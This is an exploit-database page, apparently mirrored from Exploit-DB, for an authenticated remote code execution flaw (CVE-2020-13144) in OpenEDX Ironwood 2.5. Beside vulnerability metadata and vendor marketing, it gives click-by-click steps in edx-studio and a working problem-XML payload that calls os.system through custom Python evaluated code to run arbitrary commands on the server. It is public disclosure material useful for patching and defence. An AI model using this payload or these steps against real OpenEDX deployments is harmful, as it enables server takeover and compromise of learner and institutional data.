Lucene search
K

OpenEDX platform Ironwood 2.5 - Remote Code Execution

🗓️ 21 May 2020 00:00:00Reported by Daniel MonzónType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 486 Views

OpenEDX platform Ironwood 2.5 - Remote Code Execution vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0daydb
PHP-Fusion 9.03.50 - Cross Site Scripting
24 May 202015:24
0daydb
0daydb
OpenEDX Ironwood 2.5 CVE-2020-13144 - Remote Code Execution
24 May 202015:29
0daydb
0daydb
WebLogic Server CVE-2020-2555 - Remote Code Execution
24 May 202015:30
0daydb
0day.today
OpenEDX platform Ironwood 2.5 - Remote Code Execution Vulnerability
21 May 202000:00
zdt
CNVD
Open edX Input Validation Error Vulnerability
19 May 202000:00
cnvd
CVE
CVE-2020-13144
18 May 202018:23
cve
Cvelist
CVE-2020-13144
18 May 202018:23
cvelist
EUVD
EUVD-2020-5420
7 Oct 202500:30
euvd
NVD
CVE-2020-13144
18 May 202019:15
nvd
OSV
CVE-2020-13144
18 May 202019:15
osv
Rows per page
# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-20
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://open.edx.org/
# Software Link: https://github.com/edx/edx-platform
# Version: Ironwood 2.5
# Tested on: Debian x64
# CVE : CVE-2020-13144

CVE ID: CVE-2020-13144

OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced

This is an authenticated vulnerability, so you need to register an account, go to /edx-studio

Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code

Once here we just need to edit the problem and introduce a payload such as:

<problem>

<script type="python">
def test_add(expect,ans):
    import os
    os.system("thecommandyouwanttoexecute")
    
</script>

<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
        <textline size="10" correct_answer="11" label="Integer #1"/><br/>
        <textline size="10" correct_answer="9" label="Integer #2"/>
</customresponse>

    <solution>
        <div class="detailed-solution">
          <p>Solution or Explanation Heading</p>
          <p>Solution or explanation text</p>
        </div>
    </solution>
</problem>

And click Submit, and you will execute commands in the machine

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 May 2020 00:00Current
9High risk
Vulners AI Score9
CVSS 26.5
CVSS 3.18.8
EPSS0.0393
486